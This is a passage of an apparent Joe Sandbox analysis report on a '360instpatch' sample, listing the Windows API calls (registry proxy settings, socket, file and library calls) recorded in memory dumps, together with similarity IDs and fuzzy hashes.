                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_String_base::_Xlen.LIBCPMT ref: 6BEE8B1A
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __EH_prolog3.LIBCMT ref: 6BF51FBC
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __CxxThrowException@8.LIBCMT ref: 6BF51FE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675473389-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_String_base::_Xlen.LIBCPMT ref: 6BEE8AB9
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __EH_prolog3.LIBCMT ref: 6BF51FBC
                                                                                                                                                                                                                • Part of subcall function 6BF51FB5: __CxxThrowException@8.LIBCMT ref: 6BF51FE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675473389-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF7DCA
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: _memset.LIBCMT ref: 6BF23151
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: RasEnumConnectionsW.RASAPI32(?,?,?), ref: 6BF2317C
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: _memset.LIBCMT ref: 6BF2319B
                                                                                                                                                                                                                • Part of subcall function 6BF231EC: RasGetConnectStatusW.RASAPI32(?,?), ref: 6BF231B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3492228599-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEED902
                                                                                                                                                                                                                • Part of subcall function 6BF23CE4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,0000083F,?,00000000,?,6BF23E87,?,?,0000083F), ref: 6BF23CFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2800726579-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6CD5C25C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00B5236A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 846599473-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6CD34CF0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CB,00000000,00000001), ref: 6BF2C839
                                                                                                                                                                                                                • Part of subcall function 6BF2C522: _memset.LIBCMT ref: 6BF2C530
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2839725968-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00B28967
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,6BF05BD5,customproxytype,?,AA5945B3), ref: 6BF26C13
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CD,00000000,00000001), ref: 6BF2C776
                                                                                                                                                                                                                • Part of subcall function 6BF2C522: _memset.LIBCMT ref: 6BF2C530
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2839725968-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD3AE46
                                                                                                                                                                                                                • Part of subcall function 6CD3AD48: _memset.LIBCMT ref: 6CD3AD6C
                                                                                                                                                                                                                • Part of subcall function 6CD3AD48: PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6CD3AD82
                                                                                                                                                                                                                • Part of subcall function 6CD3A35F: _memset.LIBCMT ref: 6CD3A39B
                                                                                                                                                                                                                • Part of subcall function 6CD3A35F: GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 6CD3A3B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CombineFileH_prolog3ModuleNamePath
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2129597180-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000002,?,00B48D5A,00000000,00000000,?,?,00B86931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 00B86AC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00B7FC56,?,?,?,00000000,?,?), ref: 00B7A2C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DrawGdipImageRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2615643336-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00B329C2
                                                                                                                                                                                                                • Part of subcall function 00B94656: RaiseException.KERNEL32(?,?,?,00B180B1,?,?,?,?,?,00B180B1,00BEF5B8,00BEF5B8), ref: 00B94698
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3976011213-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,6BF05B99,proxytype,00000001,proxytype,?,AA5945B3), ref: 6BF26CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00B289A8
                                                                                                                                                                                                                • Part of subcall function 00B226C0: RegCloseKey.ADVAPI32 ref: 00B226CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,?,6CDE43D3,00000001,?,?,?,6CDE454C,?,?,?,6CE25448,0000000C,6CDE4607), ref: 6CDE819E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,?,6BF3D8C5,00000001,?,?,?,6BF3DA3E,?,?,?,6BF7C420,0000000C,6BF3DAF9), ref: 6BF40433
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • recvfrom.WS2_32(?,?,?,?,?,?), ref: 6BF2FCF4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recvfrom
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,00B48D06,?,?,.dir,?), ref: 00B8047E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 6BF304C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncSelect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3214710386-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00B1E50C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetGetConnectedState.WININET(?,00000000), ref: 00B56821
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ConnectedInternetState
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 97057780-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetGetConnectedState.WININET(00B2BB49,00000000), ref: 00B78968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ConnectedInternetState
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 97057780-0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000000,00000064,00000000), ref: 6BF2C5D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Timer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2870079774-0
                                                                                                                                                                                                              • Opcode ID: 660e6faadcbfc0cc6aed5cf6dd63474e40075557623a023e501dd101a3033934
                                                                                                                                                                                                              • Instruction ID: d419b2e5396ab58f31603281c05904dc6d820d7f2819d0404139bc36dbfd82f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 660e6faadcbfc0cc6aed5cf6dd63474e40075557623a023e501dd101a3033934
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD0C9B3661201AAFB908B289CA6F1936E2E716714F7104E1F214EA4F0C775D9988605
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                              • Opcode ID: 136d3de95ff93e8f476513781e6d6468806ab420255770a484f058b5727560ce
                                                                                                                                                                                                              • Instruction ID: 2cb175c13bba06c2a495e4a9e91b1e26913d421be668598e62d648fb6d674b3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136d3de95ff93e8f476513781e6d6468806ab420255770a484f058b5727560ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99D06776140608EFCB429F84D844FA57BA5FB19325F6480D9F6190A572C737D8B2DF84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                              • Opcode ID: 3f661ff6bf235ed516ea849cd5c29caf5180930123cf0874ed4cb0f355efc129
                                                                                                                                                                                                              • Instruction ID: 39e54ac2c48ada32e1b4a8baf1bd906c4b384e5e00b4e18a945b5f6f0ec5ba49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f661ff6bf235ed516ea849cd5c29caf5180930123cf0874ed4cb0f355efc129
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BD06737140608EFCB419F80D944FA57BA5FB19325F648099FA180A671C737D972DF80
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,00000000,6BF05DF0,ieproxy), ref: 6BF26D11
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1108222502-0
                                                                                                                                                                                                              • Opcode ID: 81d0043212187da8b5ff86613622e1cff8a90f9dc3b97e6e86ac3aba1666a9f7
                                                                                                                                                                                                              • Instruction ID: 2d85464015cbaaab6016fb07cee9549813c34df55f95403be00dd09f761d6d26
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d0043212187da8b5ff86613622e1cff8a90f9dc3b97e6e86ac3aba1666a9f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED0123376420ABBDB004AB4CA08B277AD8EB56B06F50C8A9B456C20B1D7B9C415F671
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • connect.WS2_32(?,00000000,00000000), ref: 6BF2FE6A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
